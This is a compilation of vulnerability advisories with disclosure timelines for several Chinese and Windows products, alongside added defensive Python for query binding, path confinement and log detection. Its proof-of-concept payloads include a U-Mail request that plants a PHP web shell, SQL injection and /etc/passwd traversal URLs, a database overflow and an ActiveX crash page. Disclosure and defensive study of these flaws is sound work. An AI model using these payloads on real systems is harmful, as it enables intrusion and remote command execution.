RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities

Vulnerable: v3.0.7.x
Vendor: www.rj-itop.com
Category: Input Validation Error
Impact: SQL injection

Details:
=========
Multiple SQL injection vulnerabilities have been found in RJ-iTop Network
Vulnerability Scanner System, which can be exploited by malicious users to
conduct SQL injection and script insertion attacks. The id parameter of
roleManager.jsp, shown in the PoC below, reaches the database query without
validation. Authentication is required to exploit these vulnerabilities.

POC: 
=========
https://8.8.8.8/roleManager.jsp?type=query&id= [SQL Injection]

Timeline:
========
2009.10.19   Reported to vendor (no response)
2009.11.15   Reported to vendor a second time
2009.11.19   Report to CNNVD
2010.04.13   Public
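The bug class behind the roleManager.jsp finding, shown as an added example that is not RJ-iTop's code: the product's JSP source is not public, so the table name, its columns and the function names below are assumptions, and sqlite3 stands in for the product's database. The first function concatenates the id parameter into the SQL text; the second validates it and binds it as a value, which is the fix a reviewer would ask for.

```python
import sqlite3

# Constructed sample rows; the real RJ-iTop schema is unknown, so the table
# name "role" and its columns are assumptions made for this example.
ROLES = [(1, "admin"), (2, "auditor"), (3, "operator")]


def _connect() -> sqlite3.Connection:
    """Create an in-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE role (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO role VALUES (?, ?)", ROLES)
    return conn


def query_role_vulnerable(id_param: str) -> list:
    """Vulnerable form: the request parameter is pasted into the SQL text,
    so anything the caller sends becomes part of the WHERE clause."""
    conn = _connect()
    sql = "SELECT id, name FROM role WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def query_role_safe(id_param: str) -> list:
    """Hardened form: reject anything that is not an integer, then bind the
    value through a placeholder so it can never alter the statement."""
    if not id_param.isdigit():
        raise ValueError("id must be a non-negative integer")
    conn = _connect()
    sql = "SELECT id, name FROM role WHERE id = ?"
    return conn.execute(sql, (int(id_param),)).fetchall()


if __name__ == "__main__":
    # A well-formed id behaves the same in both versions.
    print(query_role_vulnerable("2"), query_role_safe("2"))
    # An id carrying SQL syntax rewrites the WHERE clause in the vulnerable
    # version and is rejected before reaching the database in the safe one.
    print(query_role_vulnerable("2 OR 1=1"))
    try:
        query_role_safe("2 OR 1=1")
    except ValueError as err:
        print("rejected:", err)
```

The type check matters even with binding: a parameter that is documented as numeric should be converted to a number before it is passed on, so that the database never sees free-form text for it.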
 
 
DM Database Server Memory Corruption Vulnerability
==================================================
Vulnerable: All versions
Vendor: www.dameng.com
Discovered by: Shennan Wang (HuaweiSymantec SRT)
CVE: CVE-2010-2159
Details:
=========
A vulnerability in all versions of DM Database Server allows an attacker to
execute arbitrary code or cause a denial of service (DoS). Authentication is
required to exploit this vulnerability. The specific flaw exists within the
SP_DEL_BAK_EXPIRED procedure. The debugger output below shows the access
violation in a "repne scas" (string scan) instruction inside wdm_dll.dll,
and the "da ebp" dump shows the 'A' argument at the address held in ebp.

POC: 
=========
CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', '');

(458.5fc): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=02d3d430 ecx=ffffffff edx=074ecfd0 esi=074ed37c edi=0000041c
eip=100d1753 esp=074eccec ebp=074ed1fc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** WARNING: Unable to verify checksum for C:\dmdbms\bin\wdm_dll.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\dmdbms\bin\wdm_dll.dll -  wdm_dll+0xd1753:
100d1753 f2ae            repne scas byte ptr es:[edi]
0:009> da ebp
074ed1fc  "AAAAAAAAAAAAAAAAAAAA"

Timeline:
========
2010.04.17   Reported to vendor, no response.
2010.05.31   Public
 
 

U-Mail Webmail Arbitrary File Write Vulnerability
==================================================
Vulnerable: U-Mail 4.91
Vendor: www.comingchina.com
Category: Input Validation Error
Impact: An attacker can write arbitrary data to new files.
Author: Shennan Wang
Date: 2008-10-30
Web: http://hi.baidu.com/nansec
CVE: CVE-2008-4932
Details:
=========
This vulnerability allows remote attackers to write arbitrary files on
vulnerable installations of U-Mail Webmail Server. Authentication is required
to exploit this vulnerability. The specific flaw exists in the 'edit.php' file
of the filesystem module running on the U-Mail Webmail Server: as the request
below shows, the destination path, file name and file content are all taken
directly from the POST parameters (path, name, content), so a malicious HTTP
POST request can write an arbitrary file into the publicly accessible web
directories.
Exploit:
=========
POST /webmail/modules/filesystem/edit.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-silverlight, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
Referer: http://mail.d4rkn3t.cn/webmail/modules/filesystem/edit.php
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Host: mail.d4rkn3t.cn
Content-Length: 120
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: GO_AUTH_SOURCE_KEY=0; LANGUAGE_CK=zh_CN; SCREEN_CK=Default+Style; PHPSESSID=0fa330ffdfd62d9e1bd8bd3942974a18

path=/var/www/htdocs/webmail/cmd.php&task=save&name=cmd.php&content=<?system($_GET[cmd]);?>

 
 

Microsoft Works 7 WkImgSrv.dll Crash Vulnerability
==================================================
Vulnerable: WkImgSrv.dll version 7.03.0616.0
Tested on: IE7 + Windows XP SP2 (Chinese)
Reference: http://marc.info/?l=bugtraq&m=120845200813992&w=2


POC: 
<html>
<head>
  <title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
  <script language="JavaScript">
    function payload() {
      var num = -1;
      obj.WksPictureInterface = num;
    }
  </script>
</head>
<body onload="JavaScript: return payload();">
  <object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj">
  </object>
</body>
</html>
 
 

Directory traversal in EdiorCMS V3.0
====================================

Application:  EdiorCMS V3.0
Vendor:      http://www.edior.com
Versions:     3.0
Platforms:    ALL
Bug:          Directory traversal
Exploitation: remote
Date:         13 Mar 2008
Author:       Shennan Wang
              e-mail: wsn1983@gmail.com
POC:          http://site/ecms/search.php?_SearchKeyWord=&_SearchField=Title&_SearchTemplate=../../../../../../etc/passwd  
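A single path-confinement helper that addresses both the U-Mail file write above (an absolute "path=" parameter and a server-executable file name) and the EdiorCMS traversal (a "../" chain in "_SearchTemplate"). This is an added example and not code from either vendor; the directory roots, allow-lists and function names are assumptions constructed for it.

```python
import posixpath

# Assumed deployment roots, constructed for this example; they are not the
# real U-Mail or EdiorCMS directory layouts.
USER_FILES_ROOT = "/var/www/htdocs/webmail/userfiles"
TEMPLATE_ROOT = "/var/www/htdocs/ecms/templates"
# Allow-lists of extensions: nothing the web server would execute.
USER_FILE_TYPES = {".txt", ".html"}
TEMPLATE_TYPES = {".tpl"}


class UnsafePath(ValueError):
    """Raised when a request-supplied path must not be used."""


def resolve_under(root: str, user_path: str, allowed_types: set) -> str:
    """Return the canonical absolute path for user_path confined to root.

    Three checks, each aimed at a shape seen in the advisories above:
    an absolute path (the U-Mail "path=" parameter), "../" sequences that
    climb out of root (the EdiorCMS "_SearchTemplate" parameter), and a
    file type the application should never write or include. NUL bytes are
    rejected because C-based runtimes truncate the string there.
    """
    if "\x00" in user_path:
        raise UnsafePath("NUL byte in path")
    if user_path.startswith(("/", "\\")) or ":" in user_path:
        raise UnsafePath("absolute path not allowed")
    # Windows-style separators are normalised so "..\\" cannot slip past.
    user_path = user_path.replace("\\", "/")
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, user_path))
    # normpath has collapsed every "../"; if the result does not still sit
    # strictly under root, the request tried to escape.
    if posixpath.commonpath([root, candidate]) != root or candidate == root:
        raise UnsafePath("path escapes the permitted directory")
    if posixpath.splitext(candidate)[1].lower() not in allowed_types:
        raise UnsafePath("file type not permitted")
    return candidate


if __name__ == "__main__":
    cases = [
        (USER_FILES_ROOT, "notes.txt", USER_FILE_TYPES),
        (USER_FILES_ROOT, "/var/www/htdocs/webmail/cmd.php", USER_FILE_TYPES),
        (USER_FILES_ROOT, "cmd.php", USER_FILE_TYPES),
        (TEMPLATE_ROOT, "default.tpl", TEMPLATE_TYPES),
        (TEMPLATE_ROOT, "../../../../../../etc/passwd", TEMPLATE_TYPES),
    ]
    for root, requested, types in cases:
        try:
            print("OK  ", requested, "->", resolve_under(root, requested, types))
        except UnsafePath as err:
            print("DENY", requested, "->", err)
```

The check is lexical only. In a real deployment, follow it with os.path.realpath on the parent directory to defeat symlinks planted inside the root, and configure the web server so that nothing under the user-file root is ever executed as script.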
 
 

Alt-N WebAdmin Source Code Disclosure Vulnerability
===================================================
Vulnerable: v3.3.3
Vendor: www.altn.com
Category: Environment Error


Vulnerable:
========
Alt-N WebAdmin 3.3.3
U-Mail for Windows V9.8
U-Mail GateWay for Windows V9.8


Details:
=========
A source code disclosure vulnerability exists in Alt-N WebAdmin Server.
A remote attacker can obtain the source code of server-side pages by appending
"%2e" (an encoded dot) or "%20" (an encoded space) to a URI. In this class of
bug the altered name no longer matches the script handler's extension mapping,
so the file is returned as plain text instead of being executed.
Tested on U-Mail for Windows V9.8 and U-Mail GateWay for Windows V9.8.


POC: 
=========
http://ip:1000/login.wdm%20
http://ip:1000/login.wdm%2e
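A detection view over the request shapes that recur in this page (an encoded trailing dot or space on a script URI as in the Alt-N PoC, a "../" chain in a query parameter as in EdiorCMS, SQL syntax in a numeric parameter as in RJ-iTop, and POSTs to a file-editing endpoint as in U-Mail), written as an added Python example that is not part of any of the advisories. The log lines are constructed in Apache combined format and the endpoint watch-list is hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed log lines echoing the PoC shapes above; they are not real
# traffic from any of the vendors and were not taken from the advisories.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Mar/2008:10:00:01 +0800] "GET /ecms/search.php?_SearchKeyWord=&_SearchField=Title&_SearchTemplate=../../../../../../etc/passwd HTTP/1.1" 200 1043
10.0.0.5 - - [13/Mar/2008:10:00:02 +0800] "GET /login.wdm%20 HTTP/1.1" 200 5120
10.0.0.6 - - [13/Mar/2008:10:00:03 +0800] "GET /login.wdm%2e HTTP/1.1" 200 5120
10.0.0.7 - - [13/Mar/2008:10:00:04 +0800] "GET /roleManager.jsp?type=query&id=1%20OR%201%3D1 HTTP/1.1" 200 880
10.0.0.8 - - [13/Mar/2008:10:00:05 +0800] "POST /webmail/modules/filesystem/edit.php HTTP/1.1" 200 12
10.0.0.9 - - [13/Mar/2008:10:00:06 +0800] "GET /ecms/search.php?_SearchKeyWord=hello&_SearchTemplate=default.tpl HTTP/1.1" 200 2200
10.0.0.9 - - [13/Mar/2008:10:00:07 +0800] "GET /login.wdm HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d+)'
)
# Quotes, comment markers, statement separators or boolean/query keywords
# inside a parameter value.
SQLI_RE = re.compile(r"('|--|;|\b(?:or|and|union|select)\b)", re.IGNORECASE)
# Percent-encoded space or dot as the very last characters of the path.
SUFFIX_RE = re.compile(r"%(?:20|2e)$", re.IGNORECASE)
# Hypothetical watch-list seeded from the U-Mail advisory above.
WATCHED_WRITE_ENDPOINTS = {"/webmail/modules/filesystem/edit.php"}


def classify(method: str, target: str) -> list:
    """Return finding labels for one request line's method and target."""
    findings = []
    parts = urlsplit(target)
    if SUFFIX_RE.search(parts.path):
        findings.append("encoded-suffix")
    # Decode twice so a double-encoded "%252e%252e/" is also caught.
    decoded = unquote(unquote(target))
    if "../" in decoded or "..\\" in decoded:
        findings.append("path-traversal")
    for _key, value in parse_qsl(parts.query, keep_blank_values=True):
        if SQLI_RE.search(unquote(value)):
            findings.append("sqli-pattern")
            break
    if method.upper() == "POST" and parts.path in WATCHED_WRITE_ENDPOINTS:
        findings.append("watched-write-endpoint")
    return findings


def scan(log_text: str) -> list:
    """Parse combined-format lines and return (ip, target, findings) hits."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        findings = classify(match["method"], match["target"])
        if findings:
            hits.append((match["ip"], match["target"], findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan(SAMPLE_LOG):
        print(ip, ", ".join(findings), target)
```

Keep the encoded-suffix check on the raw path rather than the decoded one: once "%2e" has been decoded to "." the request looks like an ordinary page name and the signal is gone.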


Reference:
=========
www.comingchina.com/download.html
http://www.nansec.com/